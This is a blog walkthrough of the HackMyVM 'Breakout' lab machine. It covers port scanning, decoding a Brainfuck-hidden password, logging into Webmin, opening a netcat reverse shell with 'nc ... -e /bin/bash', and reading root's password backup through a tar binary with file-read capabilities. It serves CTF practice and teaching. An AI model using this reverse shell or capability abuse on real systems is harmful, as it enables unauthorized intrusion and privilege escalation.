Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Breakout Walkthrough


Key points: thorough enumeration

https://hackmyvm.eu/machines/machine.php?vm=Breakout


Scan all ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.33.145  -oN ports.log
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST
 Nmap scan report for 192.168.33.145
 Host is up (0.0022s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
 |_http-title: 200 — Document follows
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:
 |_clock-skew: 7h59m58s
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-10-22T22:03:10
 |_  start_date: N/A


Check the source code of index.html on port 80.

 <!--
 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
 
 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
 
 
 -->


It's Brainfuck code. Decoding it with an online interpreter gives the string ".2uqPEfj3D<P'a-3". The comment calls it "encrypted", but Brainfuck is only an encoding: anyone who finds the comment can recover the password without a key.
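To show that the "encrypted" comment is just an encoding, here is a small Brainfuck interpreter that decodes it offline. This is an added example, not code from the original walkthrough; BF_PROGRAM is the program copied verbatim from the HTML comment above, and the interpreter assumes 8-bit cells and a program that reads no input.

```python
# Program copied verbatim from the HTML comment served on port 80.
BF_PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++."
    ">>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++."
    "<<+.>-.--------.++++++++++++++++++++.<------------.>>---------."
    "<<++++++.++++++."
)

def match_brackets(code: str) -> dict:
    """Map every '[' to its ']' and back, so loops jump in O(1)."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps

def run_brainfuck(code: str, max_steps: int = 1_000_000) -> str:
    """Run a Brainfuck program that takes no input; return what it prints.
    Cells are 8-bit (wrap at 256); max_steps stops a runaway loop."""
    jumps = match_brackets(code)
    tape, ptr, pc, out = bytearray(30000), 0, 0, []
    for _ in range(max_steps):
        if pc >= len(code):
            return "".join(out)
        ch = code[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]      # cell is zero: skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]      # cell is non-zero: repeat the loop body
        pc += 1                 # ',' (input) is a no-op for this program
    raise RuntimeError("step limit exceeded")
```

Calling run_brainfuck(BF_PROGRAM) returns the same string as the online decoder, ".2uqPEfj3D<P'a-3".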

Use enum4linux to enumerate SMB; it reveals a local user.

 ~ enum4linux 192.168.33.145 | tee enum.log
 ...
 S-1-22-1-1000 Unix User\cyber (Local User)
 


With the username cyber and the password decoded from the Brainfuck code, we can log in on port 20000.

In the control panel, we find a command shell.

[Screenshot: image-20211022224903817.png]


Running "nc 192.168.33.128 1234 -e /bin/bash" in that shell gives us a reverse shell on our listener.

 ~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.145.
 Ncat: Connection from 192.168.33.145:35206.
 id
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 cyber@breakout:~$


Search for files with capabilities set.

 cyber@breakout:/$ getcap / -r 2>/dev/null
 getcap / -r 2>/dev/null
 /home/cyber/tar cap_dac_read_search=ep
 /usr/bin/ping cap_net_raw=ep


We also find a password backup that only root can read.

 cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak


Because /home/cyber/tar has cap_dac_read_search, it can read files regardless of their permissions, so we archive the backup directory with it and extract the archive in /tmp.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 /var/backups/
 /var/backups/.old_pass.bak
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 var/backups/
 var/backups/.old_pass.bak
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak
 Ts&4&YurgtRX(=~h


Finally, with that password, we get root.

 root@breakout:~# id;hostname
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 breakout





Powered By Z-BlogPHP 1.7.1